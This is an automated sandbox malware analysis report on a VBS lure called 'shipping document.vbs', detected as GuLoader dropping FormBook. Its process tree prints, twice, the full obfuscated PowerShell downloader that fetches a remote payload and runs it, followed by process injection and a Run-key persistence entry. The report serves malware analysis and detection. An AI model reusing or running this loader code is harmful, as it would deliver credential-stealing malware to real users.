Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
shipping document.vbs

Overview

General Information

Sample name:shipping document.vbs
Analysis ID:1430120
MD5:1dce662b3782fbec7c5f4f73d8e63f41
SHA1:25cf442e9e62d5a83dd81c980da84c5ec27dac75
SHA256:35b1922951d049fedf34ebd18d57fd8acccaf65e462c6dc6308f5d63e17381ee
Tags:vbs
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Creates autostart registry keys with suspicious names
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Potential malicious VBS script found (suspicious strings)
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 2920 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\shipping document.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WmiPrvSE.exe (PID: 6332 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 6856 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st promeFlambrS.orvsI for.PrkenHColoneSpindagal.idunsupeChackrTod,msMelon[ M.sh$VrsarB Trafo sskrgSuperhefteroCeremlSigtvd Kr.bePerierho ogsJelvakIntereXyl nrTtnin] Afgi=Serve$FlertU AppesRundshUndtaeSpreweLdstenUd yt ');$Festtale=Quillaia 'HandeRSemi,eOverfpBloteaepidii Ol.jn Du.ptFizzieUphoar Ray,sVaric.MilkeDEmotio estiwUdlign IndelTeosoosilicaMtaa dAbrasFDrosliSoccilCleaneSkatt(Azafr$SlgelFKitteiOpstinMikset Dags,Crush$ BefrSvoldek draciTriphb.chizsBe,ldjUnexpostudeuUnmudr SympnPr,ddaFlytnlSlippesqua r L,vsndiasteKunstsSsy,e) dr t ';$Festtale=$Resignerendes[1]+$Festtale;$Skibsjournalernes=$Resignerendes[0];Standglas249 (Quillaia 'Brakm$LighegSurfalCongoo Fy,sbPrecoaGudbjlBar o: SupeRCleareSofa.m u maaUdkomr SchokAntila AfsobUn.rrlPeri,y Solp=Win e(TaksaT ogleeornamsM nistK,mme-,ankePIdioea Crowt RehahMedie Ballv$ Odr SInstikDetroiDorosbAperisKan.ijFruesoN,rreuV ndmrKaraknOculaa Ly,nl .asseStiftr UndenOverseBartesNu,me) St a ');while (!$Remarkably) {Standglas249 (Quillaia 'Thoma$Co trg AnorlSygelo onarbSlangaGo rmlForbr:UfuldPbrumpapapmarUnpuntExactoMflov=Forld$HitchtCorrirkussouSelvseMo.ul ') ;Standglas249 $Festtale;Standglas249 (Quillaia 'BefstSun,ontSir paconderNilavt pons-ExtraS Dus,lIs lue.udlaeLakmupulemp Yd,rs4An,sc ');Standglas249 (Quillaia 'Entir$Manipg ForglAffiloSporubManufaUkamplSprng:Bons.RMagiseMudcamprinca N porBlikkkBl,asaHed,ebv.redlStaffyNon.o=shaiv(JospiTunglaeUkends urantAfg.a- Afh.PSjaslaUpdritPers hBe rb Amor$JagttSRappokDetaciAerobbL,annsGadedjstranoToxicuFor,trStoern UndeahyldelD.wnseFormerPassenSia eeFigensUn.ea)D.min ') ;Standglas249 (Quillaia ' Summ$CrookgReprolBadehoHypoxb RickaSkotjlGener:MarkrR Heiso Av.ac Egnsk Domss SamlaOikoln mortg EklieMonoprSigurn Mer.eBe,resS.agh7H rmo1Broch=Ruske$Bredyg ,ictl Mordo SubgbLauserBandwl.ilig: LejrrLuk.euUnderlmellol SynseOverfbKnudsrSm kit .nfo+Hu,dr+S,and%Bereg$Udde P Akt,r dundfKarataVeloubL.thir TyleiDdsmakGiol e,ilburModer.BintjcAvisuoMikrouCertinWoometMicro ') ;$Fint=$Prfabriker[$Rocksangernes71];}Standglas249 (Quillaia 'Ko,ls$Testag Frecl Forbori.orbEditoaOpklol Salv: Vi,uTFodenr FifolStvlebSalmoi SpacnForesdDokumeC.rku Noble=Gejs VanilGSaltveLrerrtPhena-,nomaCbennso rognBitt.t Nonce Evo nEftertFrste Stapl$libatSDialyk BestiRamsobAlgopsBaa.ejReg oo cycluClimar.idernKursaa irselBas,ie Gloorc,athnJuli eHem csbistt ');Standglas249 (Quillaia 'Unfee$Arbejg,opillT,lbao ikkeb Dis.aEx,rclTrigg: B triP,lvenradisdingleeBeskac Sta.iPolycpSproghD releSemidrGendaa,ottibHagi.lL,ghteCholi Papal=Katar Seren[.tomkSBivaayInters,dkldtTrakkeUnbeam viva.Z.oloCD.posoSc.nin,ourmv CoreePanserPistatE der]O,ste:Forna:Ma.teFwo,mer TestoBankkmJernsBTrs raPrgnas Fnbleparri6 Ta k4Tom eSEntaltSpicurR pariSyrernPdagogHuman(Prveb$HovedTRigsorUse slS,nsobSioldiMistvnWolfrdHor eeAntil) Be e ');Standglas249 (Quillaia 'Konom$Di,gdg NordlBroomoHyphebIn eraUnseplKofan:ExcreAUngulc,vaerr Fodse AllenArsen Ultra=,psee Ope,a[CadgiS Af,eyPetausmyeletDro,kePibrom Reli.UnderTDogmeeHemizx Engrt Fox,..illiE Chafn FlascDonkeoOmb kd RegniLegitn CephgDoesk]Stk.s: .ors: B,reA Fj.lSVulgaC,riadIA.troI Spir.HernaGYiddieFar otBedemS,roantNoncer Bi.niEjersnT.rrigPol,p(Bra,k$ Redii,atihnGr,nddSvirreRhizocKanali AnnopRunddhSubareti.anrMesocaT,lsibRaketlHjerte Kort)I.ter ');Standglas249 (Quillaia 'B,lde$ Mangg ReaclWhippoSolidbIndisaPrinclBelej:NatioDArkaii ordearevy kMyo,eoSw,atnM.yasaBes,gtHalvfeFunktrOv rhnUdefre hurb=Flitt$OpsprAUdnytc,yrdsrKnivseValsen Slum. rei,sFabriuContabTaroksPeriptm llerdbefoiDatamndk,lag pla (Paa a2Lirke9Preco5Poste6 U.fr3facon8Fabri,Bem.n2 Anst9boart2Aflej1Enfon9I.can)Aotea ');Standglas249 $Diakonaterne;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3756 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5852 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st promeFlambrS.orvsI for.PrkenHColoneSpindagal.idunsupeChackrTod,msMelon[ M.sh$VrsarB Trafo sskrgSuperhefteroCeremlSigtvd Kr.bePerierho ogsJelvakIntereXyl nrTtnin] Afgi=Serve$FlertU AppesRundshUndtaeSpreweLdstenUd yt ');$Festtale=Quillaia 'HandeRSemi,eOverfpBloteaepidii Ol.jn Du.ptFizzieUphoar Ray,sVaric.MilkeDEmotio estiwUdlign IndelTeosoosilicaMtaa dAbrasFDrosliSoccilCleaneSkatt(Azafr$SlgelFKitteiOpstinMikset Dags,Crush$ BefrSvoldek draciTriphb.chizsBe,ldjUnexpostudeuUnmudr SympnPr,ddaFlytnlSlippesqua r L,vsndiasteKunstsSsy,e) dr t ';$Festtale=$Resignerendes[1]+$Festtale;$Skibsjournalernes=$Resignerendes[0];Standglas249 (Quillaia 'Brakm$LighegSurfalCongoo Fy,sbPrecoaGudbjlBar o: SupeRCleareSofa.m u maaUdkomr SchokAntila AfsobUn.rrlPeri,y Solp=Win e(TaksaT ogleeornamsM nistK,mme-,ankePIdioea Crowt RehahMedie Ballv$ Odr SInstikDetroiDorosbAperisKan.ijFruesoN,rreuV ndmrKaraknOculaa Ly,nl .asseStiftr UndenOverseBartesNu,me) St a ');while (!$Remarkably) {Standglas249 (Quillaia 'Thoma$Co trg AnorlSygelo onarbSlangaGo rmlForbr:UfuldPbrumpapapmarUnpuntExactoMflov=Forld$HitchtCorrirkussouSelvseMo.ul ') ;Standglas249 $Festtale;Standglas249 (Quillaia 'BefstSun,ontSir paconderNilavt pons-ExtraS Dus,lIs lue.udlaeLakmupulemp Yd,rs4An,sc ');Standglas249 (Quillaia 'Entir$Manipg ForglAffiloSporubManufaUkamplSprng:Bons.RMagiseMudcamprinca N porBlikkkBl,asaHed,ebv.redlStaffyNon.o=shaiv(JospiTunglaeUkends urantAfg.a- Afh.PSjaslaUpdritPers hBe rb Amor$JagttSRappokDetaciAerobbL,annsGadedjstranoToxicuFor,trStoern UndeahyldelD.wnseFormerPassenSia eeFigensUn.ea)D.min ') ;Standglas249 (Quillaia ' Summ$CrookgReprolBadehoHypoxb RickaSkotjlGener:MarkrR Heiso Av.ac Egnsk Domss SamlaOikoln mortg EklieMonoprSigurn Mer.eBe,resS.agh7H rmo1Broch=Ruske$Bredyg ,ictl Mordo SubgbLauserBandwl.ilig: LejrrLuk.euUnderlmellol SynseOverfbKnudsrSm kit .nfo+Hu,dr+S,and%Bereg$Udde P Akt,r dundfKarataVeloubL.thir TyleiDdsmakGiol e,ilburModer.BintjcAvisuoMikrouCertinWoometMicro ') ;$Fint=$Prfabriker[$Rocksangernes71];}Standglas249 (Quillaia 'Ko,ls$Testag Frecl Forbori.orbEditoaOpklol Salv: Vi,uTFodenr FifolStvlebSalmoi SpacnForesdDokumeC.rku Noble=Gejs VanilGSaltveLrerrtPhena-,nomaCbennso rognBitt.t Nonce Evo nEftertFrste Stapl$libatSDialyk BestiRamsobAlgopsBaa.ejReg oo cycluClimar.idernKursaa irselBas,ie Gloorc,athnJuli eHem csbistt ');Standglas249 (Quillaia 'Unfee$Arbejg,opillT,lbao ikkeb Dis.aEx,rclTrigg: B triP,lvenradisdingleeBeskac Sta.iPolycpSproghD releSemidrGendaa,ottibHagi.lL,ghteCholi Papal=Katar Seren[.tomkSBivaayInters,dkldtTrakkeUnbeam viva.Z.oloCD.posoSc.nin,ourmv CoreePanserPistatE der]O,ste:Forna:Ma.teFwo,mer TestoBankkmJernsBTrs raPrgnas Fnbleparri6 Ta k4Tom eSEntaltSpicurR pariSyrernPdagogHuman(Prveb$HovedTRigsorUse slS,nsobSioldiMistvnWolfrdHor eeAntil) Be e ');Standglas249 (Quillaia 'Konom$Di,gdg NordlBroomoHyphebIn eraUnseplKofan:ExcreAUngulc,vaerr Fodse AllenArsen Ultra=,psee Ope,a[CadgiS Af,eyPetausmyeletDro,kePibrom Reli.UnderTDogmeeHemizx Engrt Fox,..illiE Chafn FlascDonkeoOmb kd RegniLegitn CephgDoesk]Stk.s: .ors: B,reA Fj.lSVulgaC,riadIA.troI Spir.HernaGYiddieFar otBedemS,roantNoncer Bi.niEjersnT.rrigPol,p(Bra,k$ Redii,atihnGr,nddSvirreRhizocKanali AnnopRunddhSubareti.anrMesocaT,lsibRaketlHjerte Kort)I.ter ');Standglas249 (Quillaia 'B,lde$ Mangg ReaclWhippoSolidbIndisaPrinclBelej:NatioDArkaii ordearevy kMyo,eoSw,atnM.yasaBes,gtHalvfeFunktrOv rhnUdefre hurb=Flitt$OpsprAUdnytc,yrdsrKnivseValsen Slum. rei,sFabriuContabTaroksPeriptm llerdbefoiDatamndk,lag pla (Paa a2Lirke9Preco5Poste6 U.fr3facon8Fabri,Bem.n2 Anst9boart2Aflej1Enfon9I.can)Aotea ');Standglas249 $Diakonaterne;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 5104 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 4208 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 316 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • NJeXDhPqkKUqTApfiOc.exe (PID: 3564 cmdline: "C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • openfiles.exe (PID: 5116 cmdline: "C:\Windows\SysWOW64\openfiles.exe" MD5: 50BD10A4C573E609A401114488299D3D)
              • NJeXDhPqkKUqTApfiOc.exe (PID: 6540 cmdline: "C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • firefox.exe (PID: 4944 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • wab.exe (PID: 6820 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 6024 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • wab.exe (PID: 3320 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.1940563125.00000000084A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a6c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13c2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2a6c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x13c2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        Click to see the 15 entries

        Other

        SourceRuleDescriptionAuthorStrings
        amsi32_5852.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xe129:$b2: ::FromBase64String(
        • 0xd1f0:$s1: -join
        • 0x699c:$s4: +=
        • 0x6a5e:$s4: +=
        • 0xac85:$s4: +=
        • 0xcda2:$s4: +=
        • 0xd08c:$s4: +=
        • 0xd1d2:$s4: +=
        • 0x1725a:$s4: +=
        • 0x172da:$s4: +=
        • 0x173a0:$s4: +=
        • 0x17420:$s4: +=
        • 0x175f6:$s4: +=
        • 0x1767a:$s4: +=
        • 0xd9c6:$e4: Get-WmiObject
        • 0xdbb5:$e4: Get-Process
        • 0xdc0d:$e4: Start-Process
        • 0x15d7c:$e4: Get-Process

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: WScript or CScript Dropper
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\shipping document.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\shipping document.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\shipping document.vbs", ProcessId: 2920, ProcessName: wscript.exe
        Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe" , CommandLine: "C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe, NewProcessName: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe, OriginalFileName: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 316, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe" , ProcessId: 3564, ProcessName: NJeXDhPqkKUqTApfiOc.exe
        Sigma detected: CurrentVersion Autorun Keys Modification
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\windows mail\wab.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\openfiles.exe, ProcessId: 5116, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\-PVHSLDXBF
        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\shipping document.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\shipping document.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\shipping document.vbs", ProcessId: 2920, ProcessName: wscript.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
